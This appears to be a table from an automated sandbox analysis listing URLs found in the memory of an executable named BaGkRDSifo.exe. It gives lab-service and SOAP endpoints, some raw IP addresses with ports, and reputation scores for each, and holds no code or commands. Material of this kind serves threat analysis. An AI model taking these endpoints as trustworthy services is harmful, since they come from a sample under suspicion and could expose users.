http://www.adicon.com.cn/GetTsscPicByAdiconBarcodeT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://com.wondersgroup.jkda.application.modules.webservice	BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000035ED000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/DownloadReportFormIDListByBarcodeNoT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/ReportDetailForHzqbT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/UpLoadXmlT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/UpgradeRequestFormT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetXmmcListT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/GetReportUriT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetReportItemListByAdiconBarocde_MeiNianT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://47.104.173.216:	BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000035ED000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://47.104.173.216:9876	BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000035ED000.00000004.00000800.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003600000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/HelloWorldT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetSearchStringSampleByCustomerCodeToByteT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/T	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetSampleCountT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/LoginT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://11.65.9.11:9082/jkda/webservice/DPService	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/getPatResultNoXmlT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetByteReportT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetReportListV1T	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://com.wondersgroup.jkda.application.modules.webserviceTU	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/ExistsReportOtherT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetInputXmmcListT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetReportBaseInfoT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetSearchSampleT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/CheckUpLoadReportFromBytesT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetBLTCTPicByKeyIdT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/UpLoadOrDownLoadByXmlT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/DetailListT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetReportUserItemByYYTMT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetReportUserItemT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/AppUpLoadXmlT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetAllSampleList_MeiNianT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/AppliyUpLoadT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/GetReportFormColumnT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/retrieveDocumentViewInfoT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetReportItemListByAdiconBarocdeT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/UpLoadRequestFormClientT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetReportItemListByAdiconRepnoT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/ChangestatusT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/DownloadReportByReportFormIDT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/GetSearchStringSampleByAdiconCodeToByteT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/SetSampleDownFlagByByAdiconRepnoT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/MeiNianOriginalDataXmlUpLoadT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/UpLoadReportFromBytes_ImageListT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adicon.com.cn/SetSampleDownFlagByCustomerBarocdeT	BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
